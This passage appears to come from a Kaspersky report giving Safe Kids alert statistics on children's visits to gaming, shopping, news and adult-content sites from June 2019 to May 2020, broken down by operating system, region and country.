Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020

Kids spent more time playing video games on Windows than on macOS desktop computers and laptops. This is because most computer games are released for the Windows operating system. However, by the end of the reporting period, macOS users' interest in games had grown.

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020

Kids all around the world started visiting gaming sites less frequently, though. This can be explained by the added activity of school lessons, which moved into the home because of the pandemic. Interestingly, the share of Video Games among Windows users had already begun to decline in the fall of 2019.

While North America, Europe and Oceania did not show increased activity in Internet Communications and Software, Audio, Video, these regions had the highest shares of Video Games activity.

Kaspersky Safe Kids alerts distribution for Video Games by region in June 2019 through May 2020

According to our statistics, the UK had the highest proportion of children interested in games with 23.94 percent, followed by the US with 21.61 percent and Australia with 20.94 percent. The most popular Video Games sites in the UK and the US were blizzard.com, roblox.com, epicgames.com, discordapp.com, ubi.com, origin.com, friv.com, curseforge.com, minecraftmods.com and crazygames.com. Australia’s most popular sites in the category were roblox.com and a variety of Minecraft message boards.

Kaspersky Safe Kids alerts distribution for Video Games by country in June 2019 through May 2020

E-Commerce

E-Commerce is another category where we observed increased activity throughout the year.

Kaspersky Safe Kids alerts distribution for E-Commerce in June 2019 through May 2020

The October 2019 peak, as we said earlier, was associated with a disruption in percentage shares across categories on all platforms due to a malfunction in the new macOS. But in November and December, kids' interest in online shopping was also higher than in the other months, which is not surprising: November is the time of the Black Friday sales around the world, and December typically sees everyone busy picking Christmas and New Year's presents.

Kaspersky Safe Kids alerts distribution for E-Commerce on Windows and macOS in June 2019 through May 2020

Children who used macOS spent much more time browsing online stores than their peers who used Windows.

Kaspersky Safe Kids alerts distribution for E-Commerce by region in June 2019 through May 2020

Children in Europe, North America and Oceania visited online stores and showed interest in shopping more frequently than others. The CIS, Asia and Latin America showed the lowest activity rates in the world.

Kaspersky Safe Kids alerts distribution for E-Commerce by country in June 2019 through May 2020

The leaders by share of visits to online stores were children in Germany (19.51 percent), the UAE (17.22 percent) and Canada (15.86 percent). The lowest figures were recorded in Kazakhstan (4.60 percent) and Egypt (5.18 percent).

The most visited sites in Germany were amazon.de, otto.de, ebay.com; in the UAE, amazon.ae, panemirates.com, amazon.com and luluhypermarket.com; and in Canada, amazon.ca, visions.ca and bestbuy.ca.

News

Not just adults, but kids, too, showed interest in news, especially in light of recent events. The number of children's visits to news websites grew around the world as coverage of the pandemic began. The peak (7.26 percent) came in March, when most children were switched to distance learning.

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020

Windows users, in general, showed more interest in news than those who used macOS. However, in February, the figure for macOS (7.25 percent) was higher than that for Windows (6.75 percent).

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020

Kaspersky Safe Kids alerts distribution for News by region in June 2019 through May 2020

The largest share of News among Safe Kids users was recorded in Europe (11.11 percent), where the most active news-reading countries were the UK (14.14 percent), Germany (12.75 percent), France (10.97 percent) and Italy (10.25 percent). The lowest rates were recorded in the CIS (3.17 percent) and Africa (3.96 percent).

Kaspersky Safe Kids alerts distribution for News by country in June 2019 through May 2020

Interest in news peaked in the UK and in Italy in February. Note that the transition to distance learning in these two countries took place in late February, whereas Germany and France went through the transition in early March, and interest in news there peaked in March, too.

Adult content

Kids were interested in adult content to a lesser extent. According to the global statistics, the popularity of this category peaked in January 2020 (1.12 percent), followed by a decline to the annual average.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020

That said, macOS users showed greater interest in pornography than Windows users.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020

Though in 2019 Windows accounted for a higher percentage of alerts, the trend changed at the beginning of 2020.

Kaspersky Safe Kids alerts distribution for Adult Content by region in June 2019 through May 2020

The CIS and Europe had the largest share of users who showed interest in Adult Content: 1.07 percent and 0.83 percent, respectively. The lowest rates were recorded in the Arab world (0.18 percent) and Oceania (0.24 percent).

However, the distribution by country shows that children in Mexico had the highest interest in Adult Content: 1.72 percent.

Kaspersky Safe Kids alerts distribution for Adult Content by country in June 2019 through May 2020

They were followed by children in Russia (1.06 percent) and France (0.95 percent). Children in China were least likely to access Adult Content on desktop computers: 0.04 percent.

Summary

The world is witnessing an unprecedented demonstration of digital technology primarily helping children develop, rather than impeding their development. Online education and communication with friends and relatives are all made possible only through technology developed in recent decades, which has become not just a day-to-day assistant, but a lifeline in times when leaving home and making personal contact can pose a health threat.

Data for recent months shows that children who are staying at home with constant access to the computer primarily chat and watch videos. And those are not necessarily just entertaining videos: there might be educational content amid that stream of YouTube clips.

This year, we noticed an interesting trend: children who use different operating systems diverge in their online behavior. Kids who use macOS spend more time in online stores, show slightly more interest in adult content, chat more online and visit gaming sites less frequently. Windows users show greater interest in games and news, and visit websites with video and audio content more frequently.

We have also learned that children, like adults, pay attention to the news when the situation in the world concerns them directly. So, in the month when various countries were expecting to switch to distance learning, kids started to follow the situation more closely by going to news sites.

Today's children, who start interacting with technology at an early age, find moving all of their day-to-day activities online much easier than adults do, and they are better adapted to situations where going outside could be life-threatening. Adults tend to question certain online activity, such as communication, but in a world where it is the only safe means of social contact comes the realization that there may be more to it!
